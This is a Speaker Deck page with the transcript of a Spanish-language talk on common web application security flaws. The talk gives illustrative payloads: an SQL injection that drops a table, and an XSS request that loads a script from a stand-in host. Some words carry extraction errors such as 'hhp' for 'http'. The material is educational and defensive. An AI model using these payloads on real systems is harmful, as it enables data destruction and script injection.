Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
There Is No Silver Bullet (Español)
Search
Harley Watson
November 29, 2014
Programming
0
170
There Is No Silver Bullet (Español)
Harley Watson
November 29, 2014
Tweet
Share
More Decks by Harley Watson
See All by Harley Watson
paper tickets > smartcards, probably.
unlobito
0
7.8k
one, two step
unlobito
0
830
What's in your pocket? (BSides Manchester)
unlobito
0
1k
sorry, we're cash only. (securi-tay)
unlobito
1
1.2k
Sorry, we're cash only. (hacksoc)
unlobito
0
110
There Is No Silver Bullet
unlobito
0
970
Other Decks in Programming
See All in Programming
Patterns of Patterns
denyspoltorak
0
1.3k
Data-Centric Kaggle
isax1015
2
750
インターン生でもAuth0で認証基盤刷新が出来るのか
taku271
0
190
なるべく楽してバックエンドに型をつけたい!(楽とは言ってない)
hibiki_cube
0
140
カスタマーサクセス業務を変革したヘルススコアの実現と学び
_hummer0724
0
490
Fragmented Architectures
denyspoltorak
0
140
AIフル活用時代だからこそ学んでおきたい働き方の心得
shinoyu
0
120
AI前提で考えるiOSアプリのモダナイズ設計
yuukiw00w
0
220
re:Invent 2025 トレンドからみる製品開発への AI Agent 活用
yoskoh
0
720
AgentCoreとHuman in the Loop
har1101
5
210
Apache Iceberg V3 and migration to V3
tomtanaka
0
130
CSC307 Lecture 07
javiergs
PRO
0
530
Featured
See All Featured
The Illustrated Children's Guide to Kubernetes
chrisshort
51
51k
The Curse of the Amulet
leimatthew05
1
8k
HDC tutorial
michielstock
1
340
sira's awesome portfolio website redesign presentation
elsirapls
0
140
Everyday Curiosity
cassininazir
0
120
Future Trends and Review - Lecture 12 - Web Technologies (1019888BNR)
signer
PRO
0
3.2k
Winning Ecommerce Organic Search in an AI Era - #searchnstuff2025
aleyda
0
1.8k
Google's AI Overviews - The New Search
badams
0
900
Mozcon NYC 2025: Stop Losing SEO Traffic
samtorres
0
130
How People are Using Generative and Agentic AI to Supercharge Their Products, Projects, Services and Value Streams Today
helenjbeal
1
110
Redefining SEO in the New Era of Traffic Generation
szymonslowik
1
210
Measuring Dark Social's Impact On Conversion and Attribution
stephenakadiri
1
110
Transcript
there is no silver bullet Henri Watson
¿Cuáles son los problemas que comúnmente afectan a las
aplicaciones web en la República Dominicana?
Una falta de HTTPS
Usar HTTPS no te va a quitar el pica
pollo del día.
La propuesta actual para HTTP/2.0 obliga el uso de
TLS.
Si decides usar HTTPS, también usa Strict-‐Transport-‐Security y
ssllabs.com/ssltest
Inyecciones SQL
GET /rastreador?orden=12345”; DROP TABLE ordenes;-‐-‐ SELECT * FROM
ordenes WHERE orden = “12345”; DROP TABLE ordenes;-‐-‐” AND estado = “pendiente” Solicitud del cliente al servidor. Solicitud del servidor web a la base de datos.
None
None
None
Problemas en el manejo de autenacación
None
None
Cross-‐Site Scripang (XSS)
GET /hola?nombre=<script src=“hhp://malva.do/ jajaxddd.js”></script> ¡Hola, <script src=“hhp://malva.do/jajaxddd.js”></ script>!
Solicitud del cliente al servidor. Respuesta del servidor al cliente.
Content-‐Security-‐Policy
Exposición de datos sensiavos
None
Ualizando Componentes con Vulnerabilidades Conocidas
Mailing Lists • bugtraq hhp://www.securityfocus.com/archive/1 • debian-‐security-‐announce
hhps://lists.debian.org/debian-‐security-‐announce/ • fulldisclosure hhp://nmap.org/mailman/lisanfo/fulldisclosure
Mailing Lists •
[email protected]
hhps://hhpd.apache.org/lists.html#hhp-‐announce • nginx-‐announce
hhp://mailman.nginx.org/mailman/lisanfo/nginx-‐ announce • php-‐announce hhp://php.net/mailing-‐lists.php
None
Servicio a Cliente
None
¿Por qué una no existe una « bala de
plata »?
La seguridad informáaca es una inversión constante.
Heartbleed
Al poner los datos de tus usuarios en riesgo,
también pones tu reputación en riesgo.
¡Gracias! @henriwatson
[email protected]
hhps://henriwatson.com/talks/silverbullet